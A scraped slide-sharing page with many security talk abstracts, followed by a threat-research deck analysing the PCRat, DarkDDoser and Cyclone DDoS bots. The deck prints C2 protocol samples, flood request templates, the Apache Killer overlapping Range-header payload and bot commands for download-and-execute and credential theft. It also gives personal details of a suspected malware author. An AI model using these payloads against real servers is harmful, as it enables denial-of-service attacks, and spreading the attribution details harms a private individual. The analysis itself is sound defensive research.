Adventures in Femtoland: 350 Yuan for Invaluable Fun (arbitrarycode)
GSM networks have been compromised for over five years. Starting from passive sniffing of unencrypted traffic, moving to fully broken A5/1 encryption and then even to running your own base station, we have a range of tools and opportunities. A Motorola phone retailing for only $5 gives you the opportunity to peep into your girlfriend's calls. An RTL-SDR retailing for $20 allows you to intercept all two-factor authentication in a medium-sized office building. Lastly, a USRP retailing for $700 can intercept almost everything you can see in 2G.
But who cares about 2G? Those who are concerned have switched off 2G. AT&T is preparing to switch off all its 2G networks by the end of 2016. Even the GSMA (GSM Alliance) has admitted that security through obscurity is a bad idea (referring to COMP128, A5/*, GEA and other algorithms). 3G and LTE networks have mandatory cryptographic integrity checks for all communications and mutual authentication of both the mobile device and the base station. The opportunity to analyze all protocols and cryptographic primitives, thanks to their public availability, is important.
However, the main problem is that we do not have Calypso phones for 3G. We do not have cheap, ready-to-use devices to fuzz 3G devices over the air. Or do we? What about femtocells? Perhaps telecoms were too quick to let their guard down, relying on the security considerations embedded in 3G/4G? Users can connect to femtocells and get high-speed Internet access, make calls, etc. Why don't we abuse it?
Yes, there is already research that allows you to gain control over a femtocell. There is also research that allows sniffing calls and messages after gaining control. But all such solutions are not scalable. You are still bound to the telecom provider. You still have to connect to a VPN, to a core network. You have to bypass location binding and so on. Perhaps there is an easier solution? Perhaps we can create UMTS-in-a-box from a readily available femtocell and have them available in large quantities without telecom branding? We already know.
We will tell the whole story from unboxing to proof-of-concept data intercept and vulnerabilities in UMTS networks with all your favorite acronyms: HNB, SeGW, HMS, RANAP, SCTP, TR-069.
SCADA StrangeLove: Too Smart Grid in da Cloud [31c3] (qqlan)
For two years SCADA StrangeLove has been speaking about Industrial Control Systems and nuclear plants. This year we want to discuss Green Energy: our hackers' vision of Green Energy, Smart Grids and Cloud IoT technology.
Our latest research was devoted to the analysis of the architecture and implementation of the most widespread platforms for wind and solar energy generation, which produce many gigawatts of it. It may seem (not) surprising, but the systems which manage huge turbine towers and household photovoltaic plants are not only connected to the Internet but also prone to many well-known vulnerabilities and low-hanging 0-days. Even if these systems cannot be found via Shodan, fancy cloud technologies leave no chance for security. We will also speak about the security problems of traditional "heavy" industrial solutions, about the things that Zurich Airport and the Large Hadron Collider have in common, and why one should not develop a brand new web server. Especially for the specialists on the other side of the fence, we will show, using one industry as an example, the link between information security and industrial safety, and will also demonstrate how root access gained in a few minutes can bring to nought all the years of effort devoted to improving the fail-safety and reliability of the ICS system. On top of it you will learn about our new releases, some funny and not so funny stories about the discovery and fixing of vulnerabilities, and the latest news from the front in the struggle for the Purity of Essence.
──────────
➤Speaker: Sergey Gordeychik, Aleksandr Timorin
D1 t1 T. Yunusov, K. Nesterov - Bootkit via SMS (qqlan)
Having developed a test set, we started to research how safe it is for clients to use the 4G networks of telecommunication companies. During the research we tested SIM cards, 4G USB modems, radio components and the IP access network. First of all we looked for vulnerabilities that could be exploited remotely, via the IP or radio network.
And the results were not long in coming. In some cases we managed to attack SIM cards and install a malicious Java applet there; we were able to remotely update USB modem firmware, to change the password on a self-care portal via SMS and even to get access to the internal technological network of a carrier.
Further evolution of the attack helped us understand how it is possible to use a simple SMS as an exploit that is able not only to compromise a USB modem and all the communications that go through it, but also to install a bootkit on the box that this modem is connected to.
Presenter: Terrence Gareau
The talk explains how to build a honeypot and set up a service with continuously updated data on the DDoS bots it has caught, using Kibana, Elasticsearch, Logstash and AMQP. The speaker will open-source the system for monitoring and collecting external statistics on DDoS attacks that he and his team have been working on for the last two years.
The goal of the talk is to demonstrate how technical vulnerabilities in the IT components can be used to bypass industrial and functional safety features and create cable-melting or blackout conditions. A few (fixed) vulnerabilities in Relay Protection terminals discovered by the SCADA StrangeLove team will be discussed.
Jose Selvi - Side-Channels Uncovered [rootedvlc2018] (RootedCON)
In recent years, the term "side-channel" has gone from being a concept known only in the hardware hacking sector to a popular term within the industry, due to the vulnerabilities that have been published. CRIME, BREACH and FIESTA are clear examples of vulnerabilities that exploit a side channel in TLS. More recently, we have also seen vulnerabilities using this same concept in processors, such as Spectre and Meltdown.
In this talk, we will review the concept of "side-channel" and go over the different vulnerabilities that have been published over the last few years, explaining what they consist of and what limitations they have.
Recon: Hopeless relay protection for substation automation (Sergey Gordeychik)
Recon 2017: By Kirill Nesterov, Alexander Tlyapov
A Digital Substation is an essential part of every electrical network. It is also the base for modern Smart Grid technologies. More than 4000 IEC 61850-compatible substations operate in Europe and 20 000+ worldwide, each of them handling communication and the flow of gigawatts of electrical power between large power plants (thermal, hydroelectric or even nuclear) and their respective consumers. Such consumers include cities, industrial sites and power plants themselves. During this talk we will focus on the security analysis results of a key Digital Substation component: Relay Protection Terminals. Protective relays are devices for the detection of electrical faults. When such a fault is detected, the relay device is designed to trip a circuit breaker. Without them, problems like over-current, over-voltage, reverse power flow, over-frequency and under-frequency can lead to colorful and impressive pictures of giant electric arcs accompanied by a bunch of sparks, with total blackouts as a result.
Nowadays protective relays have become digital devices with network access, through which operators can reach different services like self-testing, statistics, logs and others. Moreover, electrical lines are also combined with fiber-optic lines for communications. The electrical part of such lines needs minimal traffic but protection against surges, so such lines can be leased to different organizations, exposing a great target for an attacker. All of the services inside such networks are available through different industrial protocols like IEC 61850 (MMS, GOOSE), IEC 104 and Modbus, the not very industrial protocols HTTP, FTP and SSH, and everybody's favorite proprietary protocols. We will show how to dig very deep inside a Relay Protection Terminal and how to abuse the numerous weaknesses and vulnerabilities inside.
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik (CODE BLUE)
The boom of AI brought to the market a set of impressive solutions both on the hardware and software side. On the other hand, massive implementation of AI in various areas brings about problems, and security is one of the greatest concerns.
In this talk we will present the results of hands-on vulnerability research on different components of AI infrastructure, including NVIDIA DGX GPU servers, ML frameworks such as PyTorch, Keras and TensorFlow, data processing pipelines and specific applications, including medical imaging and face-recognition-powered CCTV. An updated Internet Census toolkit based on the Grinder framework will be introduced.
BSides London 2015 - Proprietary network protocols - risky business on the wire. (Jakub Kałużny)
When speed and latency count, there is no place for the standard HTTP/SSL stack, and a wise head comes up with a proprietary network protocol. How to deal with embedded software or thick clients using protocols with no documentation at all? Binary TCP connections unlike anything else, impossible to adapt to a well-known local proxy. Without disassembling the protocol, pentesting the server backend is very limited. However, when you dive inside this traffic and reverse-engineer the communication, you are there. Welcome to the world full of home-grown cryptography, reversible hash algorithms and no access control at all.
We would like to present our approach and a short guideline on how to reverse engineer proprietary protocols. To demonstrate, we will show you a few case studies which in our opinion are the quintessence of "security by obscurity": the most interesting examples from real-life financial industry software, which is a particularly risky business regarding security.
CommunicAsia 2021: What is hitting my honeypots? (APNIC)
APNIC Senior Security Specialist Adli Wahid gives a presentation on the threats the APNIC honeynet project has observed and how these were mitigated or remediated at CommunicAsia 2021, held online from 14 to 16 July 2021.
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown! (EC-Council)
If organizations are truly working to limit Internet abuse and protect end users, we need to take a more thoughtful approach to botnet takedowns – or once again bots will rear their ugly heads.
There are three main causes of ineffective takedowns:
- The organizations performing botnet takedowns do so in a haphazard manner.
- The organizations do not account for secondary communication methods, such as peer-to-peer or domain generation algorithms (DGA), that may be used by the malware.
- The takedowns do not result in the arrest of the malware actor.
So what does a successful botnet takedown actually look like? In his presentation on Botnet SmackDowns, Brian Foster, CTO of Damballa, will share with attendees how to effectively take down botnets for good. The only way botnet takedowns will have a lasting impact on end-user safety is if security researchers use a comprehensive and systematic process that renders the botnet inoperable.
- IoT Security is a Safety/Privacy Issue
- Consider the devices you bring into your home and to work
Video Links:
- Hue: https://www.youtube.com/watch?v=7TOsFqqJgj4
- Slow Cooker: https://www.walmart.com/ip/BLACK-DECKER-WiFi-Enabled-6-Quart-Slow-Cooker/128745799
- Smart Toilet: https://www.youtube.com/watch?v=HyZ7S4fE5v4
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security... (Andrew Morris)
In this presentation, we will discuss using GreyNoise, a geographically and logically distributed system of passive Internet scan traffic collector nodes, to identify statistical anomalies in global opportunistic Internet scan traffic and correlate these anomalies with publicly disclosed vulnerabilities, large-scale DDoS attacks, and other newsworthy events. We will discuss establishing (and identifying any deviations away from) a “standard” baseline of Internet scan traffic. We will discuss successes and failures of different methods employed over the past six months. We will explore open questions and future work on automated anomaly detection of Internet scan traffic. Finally, we will provide raw data and a challenge as an exercise to the attendees.
How Networking works with Data Science (HungWei Chiu)
Introduces the basic concepts of networking models, including the OSI model and the TCP/IP model.
Also introduces basic ideas and functions in networking, such as routing, classification, security, etc.
Layer 8 and Why People are the Most Important Security Tool (Damon Small)
People are the cause of many security problems, but people are also the most effective resource for combating them. Technology is critical, but without trained professionals, it is ineffective. In the context of two case studies, the presenter will describe specific instances where human creativity and skill overcame technical deficiencies. The presenter believes this topic to be particularly relevant for the Packet Hacking Village, as many of the techniques used are the same ones that are pertinent for Capture the Packet and Packet Detective.
Technical details will include the specific tools used, screenshots of captured data, and analysis of the malware and the malicious user’s activity. The goal of the presentation is to show the importance of technical ability and critical thinking, and to demonstrate that skilled people are the most important tool in an information security program.
As presented at Hackfest 2015 Quebec City, November 7th 2015.
This session will focus on real world deployments of DDoS mitigation strategies in every layer of the network. It will give an overview of methods to prevent these attacks and best practices on how to provide protection in complex cloud platforms. The session will also outline what we have found in our experience managing and running thousands of Linux and Unix managed service platforms and what specifically can be done to offer protection at every layer. The session will offer insight and examples from both a business and technical perspective.
How to Get CNIC Information System with Paksim Ga.pptx (danishmna97)
Pakdata Cf is a groundbreaking system designed to streamline and facilitate access to CNIC information. This innovative platform leverages advanced technology to provide users with efficient and secure access to their CNIC details.
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -... (DanBrown980551)
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor... (Neo4j)
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
DevOps and Testing slides at DASA Connect (Kari Kakkonen)
Slides by me and Rik Marselis at the DASA Connect conference on 30.5.2024. We discuss what testing is, then what agile testing is and finally what Testing in DevOps is. Finally we had a lovely workshop with the participants, trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
GraphRAG is All You need? LLM & Knowledge Graph (Guy Korland)
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Climate Impact of Software Testing at Nordic Testing Days (Kari Kakkonen)
My slides at Nordic Testing Days, 6.6.2024.
The climate impact and sustainability of software testing are discussed in the talk. ICT and testing must carry their part of the global responsibility to help with climate warming. We can minimize the carbon footprint, but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be extended with sustainability, and then measured continuously. Test environments can be used less, at a smaller scale and on demand. Test techniques can be used to optimize or minimize the number of tests. Test automation can be used to speed up testing.
Enhancing adoption of Open Source Libraries. A case study on Albumentations.AI (Vladimir Iglovikov, Ph.D.)
Presented by Vladimir Iglovikov:
- https://www.linkedin.com/in/iglovikov/
- https://x.com/viglovikov
- https://www.instagram.com/ternaus/
This presentation delves into the journey of Albumentations.ai, a highly successful open-source library for data augmentation.
Created out of a necessity for superior performance in Kaggle competitions, Albumentations has grown to become a widely used tool among data scientists and machine learning practitioners.
This case study covers various aspects, including:
People: The contributors and community that have supported Albumentations.
Metrics: The success indicators such as downloads, daily active users, GitHub stars, and financial contributions.
Challenges: The hurdles in monetizing open-source projects and measuring user engagement.
Development Practices: Best practices for creating, maintaining, and scaling open-source libraries, including code hygiene, CI/CD, and fast iteration.
Community Building: Strategies for making adoption easy, iterating quickly, and fostering a vibrant, engaged community.
Marketing: Both online and offline marketing tactics, focusing on real, impactful interactions and collaborations.
Mental Health: Maintaining balance and not feeling pressured by user demands.
Key insights include the importance of automation, making the adoption process seamless, and leveraging offline interactions for marketing. The presentation also emphasizes the need for continuous small improvements and building a friendly, inclusive community that contributes to the project's growth.
Vladimir Iglovikov brings his extensive experience as a Kaggle Grandmaster, ex-Staff ML Engineer at Lyft, sharing valuable lessons and practical advice for anyone looking to enhance the adoption of their open-source projects.
Explore more about Albumentations and join the community at:
GitHub: https://github.com/albumentations-team/albumentations
Website: https://albumentations.ai/
LinkedIn: https://www.linkedin.com/company/100504475
Twitter: https://x.com/albumentations
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofsAlex Pruden
This paper presents Reef, a system for generating publicly verifiable succinct non-interactive zero-knowledge proofs that a committed document matches or does not match a regular expression. We describe applications such as proving the strength of passwords, the provenance of email despite redactions, the validity of oblivious DNS queries, and the existence of mutations in DNA. Reef supports the Perl Compatible Regular Expression syntax, including wildcards, alternation, ranges, capture groups, Kleene star, negations, and lookarounds. Reef introduces a new type of automata, Skipping Alternating Finite Automata (SAFA), that skips irrelevant parts of a document when producing proofs without undermining soundness, and instantiates SAFA with a lookup argument. Our experimental evaluation confirms that Reef can generate proofs for documents with 32M characters; the proofs are small and cheap to verify (under a second).
Paper: https://eprint.iacr.org/2023/1886
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
3. Agenda
• Who we are
• How and why
• DDoS Malwares
– PCRat
– DarkDDoser
– Cyclone
– Athena
– SATBot
– Cynic
• Trends and Takeaways
4. Who we are
• Dennis Schwarz
– Security Research Analyst on Arbor Networks’ ASERT
– <3 IDA Pro
– Formerly an intrusion analyst with Dell SecureWorks
• Jason Jones
– Security Research Analyst on Arbor Networks’ ASERT
– Previously of TippingPoint DVLabs
– Research interests
• IP reputation
• Malware clustering
• Data mining
5. ASERT Malware Corral
• Arbor Security Engineering & Response Team
• ASERT Malware Corral
– Malware storage + processing system
– Processing occurs via sandbox, static methods
– Tagging via behavioral and static methods
• Currently pulling in upwards of 100k samples / day
• 567 unique family names tagged last year
– Includes DDoS, RATs, Bankers, Infostealers, Targeted Threats, etc.
6. Why these malwares?
• Since someone took the time to code them, it’s only fair that we analyze them – quid pro quo
• DDoS related
• Less well known
• Our automated heuristics bubbled these up to the human analysis pile
• Special to us because we reversed them
8. PCRat – “The APT”
• Made in China
• C++
• Source code uploaded to Google Code in March 2011
– http://code.google.com/p/lszpal/
• Source code is based on Gh0st RAT
9. PCRat – Stats
• 117 unique executables
• First seen: September 14, 2012
• Last seen: February 21, 2013
• Connections, 15 unique destinations (resolved March 14, 2013)
10. PCRat – Loose Attribution
• lszpal@qq.com uploaded source code
• QQ number 449674599 from source
– Google: Lsz, StarW.lsz, lszhack, Lsztony00, unpack.cn profile, lszhack.3322.org, support@lszpal.cn
• Unpack.cn forum profile
– http://www.unpack.cn/space-username-lszpal.html
– Birthday: October 10, 1990
– Active: January 8, 2009 – March 13, 2013 (present)
– Baidu profile
12. PCRat – Loose Attribution cont.
• Baidu profile
– http://hi.baidu.com/lszhk
– Male
– 22 years old
– Lives in Shunqing District (administrative center) of Nanchong in Sichuan province
15. PCRat – Loose Attribution cont.
• 3322.org domains (resolved March 19, 2013)
– lszpal.3322.org (115.238.252.7 | ASN 4134 | CHINANET-ZJ LISHUI NODE NETWORK)
– lsz.3322.org (59.64.158.18 | ASN 4538 | BEIJING UNIVERSITY OF POSTS & TELECOMMUNICATIONS)
– starw.lsz.3322.org is an alias for lsz.3322.org
– lszhack.3322.org (221.207.59.118 | ASN 4837 | CHINA UNICOM QINGHAI PROVINCE NETWORK)
16. Aside: 221.207.59.118 Domains and Malware
• Further research on the IP is left as an exercise for the listener
• Thanks to Mike Barr of Arbor Networks for the Maltego graph
17. PCRat – Command and Control
00000000 5d 00 00 00 53 00 00 00 50 43 52 61 74 78 9c 93 ]...S... PCRatx..
00000010 f4 71 f4 73 b7 32 34 30 36 ae 09 cf cc 53 88 08 .q.s.240 6....S..
00000020 50 08 0e 30 aa 31 32 35 53 f0 75 aa f1 cc 2b 49 P..0.125 S.u...+I
00000030 cd d1 08 d2 54 88 48 cd cf 03 d1 ce 01 a1 0a 08 ....T.H. ........
00000040 e0 6a 6a 66 64 a0 a0 e0 a0 60 a4 67 62 e0 ee 51 .jjfd... .`.gb..Q
00000050 55 63 64 60 68 c4 c0 00 00 8f e3 14 0c Ucd`h... .....
• 93 byte C struct, mostly obfuscated with zlib compression
• Bytes 0-3: total length, in bytes (0x5d)
• Bytes 4-7: length of the zlib chunk after decompression, in bytes (0x53; the compressed chunk itself is 80 bytes)
• Bytes 8-12: tag (PCRat)
• Bytes 13-: zlib chunk
18. PCRat – Command and Control cont.
(Python 2 interactive session; data is the 93-byte check-in from the previous slide)
>>> data = "\x5d\x00\x00\x00\x53\x00\x00\x00\x50\x43\x52\x61\x74\x78\x9c\x93\xf4\x71\xf4\x73\xb7\x32\x34\x30\x36\xae\x09\xcf\xcc\x53\x88\x08\x50\x08\x0e\x30\xaa\x31\x32\x35\x53\xf0\x75\xaa\xf1\xcc\x2b\x49\xcd\xd1\x08\xd2\x54\x88\x48\xcd\xcf\x03\xd1\xce\x01\xa1\x0a\x08\xe0\x6a\x6a\x66\x64\xa0\xa0\xe0\xa0\x60\xa4\x67\x62\xe0\xee\x51\x55\x63\x64\x60\x68\xc4\xc0\x00\x00\x8f\xe3\x14\x0c"
>>> hex(len(data))
'0x5d'
>>> import zlib
>>> inf = zlib.decompress(data[13:])
>>> print inf
LANG:1033|Win XP SP2|256 MB|Intel(R) Xeon(R) CPU E5620 @ 2.40GHz|
2012
>>> hex(len(inf))
'0x53'
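A decoder for the framing just shown, added here as an example (not the deck's or the bot's code): it checks the length fields and the tag before inflating, fails closed on anything malformed, and carries the 93 captured bytes from the hexdump as a sample. build_beacon and the field names are constructed for the round-trip check.

```python
"""Decoder for the PCRat check-in framing on the previous slides:
4-byte total length, 4-byte inflated length, the 5-byte tag "PCRat",
then a zlib stream. Added example, not the deck's or the bot's code."""
import struct
import zlib

TAG = b"PCRat"
HEADER_LEN = 13  # 4 + 4 + 5


def read_header(buf):
    """Return (total_len, inflated_len, tag) without touching the body."""
    if len(buf) < HEADER_LEN:
        raise ValueError("frame shorter than the 13-byte header")
    total, inflated = struct.unpack_from("<II", buf, 0)
    return total, inflated, buf[8:13]


def parse_beacon(buf):
    """Validate the header, inflate the body and split the pipe-separated
    fields. Raises ValueError on any mismatch so a decoder run over
    captured traffic fails closed rather than crashing on junk."""
    total, inflated, tag = read_header(buf)
    if tag != TAG:
        raise ValueError("bad tag %r" % tag)
    if total != len(buf):
        raise ValueError("length field %d != frame length %d" % (total, len(buf)))
    try:
        plain = zlib.decompress(buf[HEADER_LEN:])
    except zlib.error as exc:
        raise ValueError("zlib body did not inflate: %s" % exc)
    if len(plain) != inflated:
        raise ValueError("inflated %d bytes, header claims %d" % (len(plain), inflated))
    return plain, plain.decode("latin-1").split("|")


def build_beacon(fields):
    """Constructed helper that frames a plaintext the same way, used to
    round-trip the parser; the field order mirrors the decoded sample."""
    plain = "|".join(fields).encode("latin-1")
    body = zlib.compress(plain)
    return struct.pack("<II", HEADER_LEN + len(body), len(plain)) + TAG + body


# The 93-byte check-in from the slide's hexdump, transcribed from the deck.
CAPTURED = bytes.fromhex(
    "5d000000530000005043526174789c93"
    "f471f473b732343036ae09cfcc538808"
    "50080e30aa31323553f075aaf1cc2b49"
    "cdd108d2548848cdcf03d1ce01a10a08"
    "e06a6a6664a0a0e0a060a46762e0ee51"
    "5563646068c4c000008fe3140c")

if __name__ == "__main__":
    print(read_header(CAPTURED))  # (93, 83, b'PCRat')
    try:
        print(parse_beacon(CAPTURED)[1])
    except ValueError as exc:
        print("capture did not decode:", exc)
```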
20. PCRat – DDoS Attack Commands
• ICMP Echo Request Flood
A --------- PING(1024 “I”s) ----------> B
A --------- PING(1024 “I”s) ----------> B
A --------- PING(1024 “I”s) ----------> B
…
• UDP Flood Types 1, 2, and 3
A --------- UDP(4000 “random bytes”) ----------> B
A --------- UDP(36 “hardcoded bytes”) ---------> B
A --------- UDP(1024 “A”s) -------------------------> B
…
21. PCRat – DDoS Attack Commands cont.
• TCP SYN Flood
A --------- SYN(spoofed src IP) ----------> B
A --------- SYN(spoofed src IP) ----------> B
A --------- SYN(spoofed src IP) ----------> B
…
• TCP SYN/ACK Flood
A --------- SYN/ACK ----------> B
A --------- SYN/ACK ----------> B
A --------- SYN/ACK ----------> B
…
22. PCRat – DDoS Attack Commands cont.
• TCP Connection Flood
A --------- SYN ----------> B
A <----- SYN/ACK ------ B
A --------- ACK ----------> B
close()
…
• TCP Flood Types 1, 2, and 3
A --------- TCP(1024 “random bytes”) ------------------> B
A --------- TCP(1024 “C&C specified bytes”) ---------> B
A --------- TCP(2048 “a”s) ---------------------------------> B
…
23. PCRat – DDoS Attack Commands cont.
• HTTP Request Flood Type 1
GET %s HTTP/1.1\r\n
Host: %s\r\n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15Cache-Control: no-store, must-revalidate\r\n
Referer: %s%s\r\n
Connection: keep-alive\r\n\r\n
• HTTP Request Flood Type 2
GET %s HTTP/1.1\r\n
Host: %s\r\n
Cache-Control: no-store, must-revalidate\r\n
Referer: %s%s\r\n
Connection: Close\r\n\r\n
24. PCRat – DDoS Attack Commands cont.
• HTTP Request Flood Type 3
GET / HTTP/1.1\r\n
Host: %s\r\n
Cache-Control: no-cache\r\n
Connection: Close\r\n\r\n
• HTTP Request Flood Type 4
GET %s HTTP/1.1\r\n
Content-Type: text/html\r\n
Host: %s\r\n
Accept: text/html, */*\r\n
User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01)\r\n\r\n
26. DarkDDoser
• Programmed in Delphi
• Written by HaLLaFaMeR x2
• Costs $30
• Boasts 5 Floods
– SYN flood
– UDP flood
– HTTP GET flood
– “SlowLoris”
– “ARME”
• Claims to be rewriting in C++
28. Search Warrant Email Account
hallafamerx2@gmail.com, et al
Case Number: 2:2011mc50698
Filed: June 7, 2011
Court: Michigan Eastern District Court
Office: Detroit Office
County: Wayne
Presiding Judge: George Caram Steeh
Nature of Suit: Other Statutes - Other Statutory Actions
Jurisdiction: Federal Question
Jury Demanded By: None
29. DarkDDoser CnC
• Many CnCs using dynamic DNS
• Simple pipe-delimited protocol on random ports
– ADDNEW|Stable|5.6c|US|Windows XP x86|Idle...|3175|NEW
– ARME|192.168.56.1|www.google.com|30|5
– ARME|<IP Address>|<Host header>|<Num forks>|<Num threads>
– SLOW|192.168.56.1|192.168.56.1|<Sockets>|<Num Forks>|<Method>
– HTTP|192.168.56.1|www.google.com|1|3000|POST
– UDP|192.168.56.1|80|65|6000|6000|55|6
– STATUS|Idle…
32. DarkDDoser Basic Floods
• UDP
– Standard flood, packet size specified by CnC
– Random port
• SYN
– Not spoofed, random ports
• HTTP
GET <target URI> HTTP/1.1
Host: 10.1.10.68
User-Agent: <random user-agent from list>
Accept: */*;q=0.1
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Referer: <random referer from list>
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
33. DarkDDoser Slowloris
GET / HTTP/1.1
Host: <website>
User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10
Accept: */*;q=0.1
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Referer: www.meta.ua
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
34. Apache ARME Vulnerability
• Apache allocates range requests into buckets
• Each range allocates more memory
• Large number of overlapping range requests causes a large amount of memory allocation
• Example:
• Range: bytes=5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,
5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,
5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,
5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-110,
5-111,5-112,5-113,5-114,5-115,5-116,5-117,5-118,5-119,5-120,5-121,5-122,5-123,5-124,
5-125,5-126,5-127,5-128,5-129,5-130,5-131,5-132,5-133,5-134,5-135,5-136,5-137,5-138,
5-139,5-140,5-141,5-142,5-143,5-144,5-145,5-146,5-147,5-148,5-149,5-150,5-151,5-152,
5-153,5-154,5-155,5-156,5-157,5-158,5-159,5-160,5-161,5-162,5-163,5-164,5-165,5-166,
5-167,5-168,5-169,5-170,5-171,5-172,5-173,5-174,5-175,5-176,5-177,5-178,5-179,5-180, 5-181,5-182,5-183
35. DarkDDoser ARME
HEAD / HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+2011-10-16 20:21:10
Range: bytes=0-63
Accept-Encoding: gzip
Connection: close

HEAD / HTTP/1.1
Host: <target>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Range: bytes=0-36
Accept-Encoding: gzip
Connection: close
45. Cyclone – Command and Control
• IRC based (yep, still being used)
• C&C details are obfuscated using the same method as MP-Ddoser/IP Killer
• Jeff Edwards of Arbor Networks has written a decoder
47. Cyclone – Identified Command
• .login <password> - log in to bot
• .logout - log out of bot
• .rc - reconnect to IRC server
• .status - show DoS attack status
• .info - show system information
• .uninstall - remove self
• .kill - kill and remove self
• .stop - stop DoS attacks
• .dl <URL> - download and execute
• .botkiller - kill off other bots on the host
• .ftp - pillage Filezilla credentials
• DDoS attacks (described next)
48. Cyclone – DDoS Attack Commands
• .udp
A --------- UDP(2000 “digits and lowercase letters”) ----------> B
A --------- UDP(2000 “digits and lowercase letters”) ----------> B
A --------- UDP(2000 “digits and lowercase letters”) ----------> B
…
• .arme
– ARME (Apache Remote Memory Exhaustion) a.k.a. Apache Killer attack by Kingcope
HEAD / HTTP/1.1
Host: 10.1.6.71
Range:bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,…a lot more…5-1298,5-1299
Accept-Encoding: gzip
Connection: close
49. Cyclone – DDoS Attack Commands cont.
• .layer7
– Randomly chooses out of 44 possible User-Agents
HEAD / HTTP/1.1
Host: 10.1.6.71
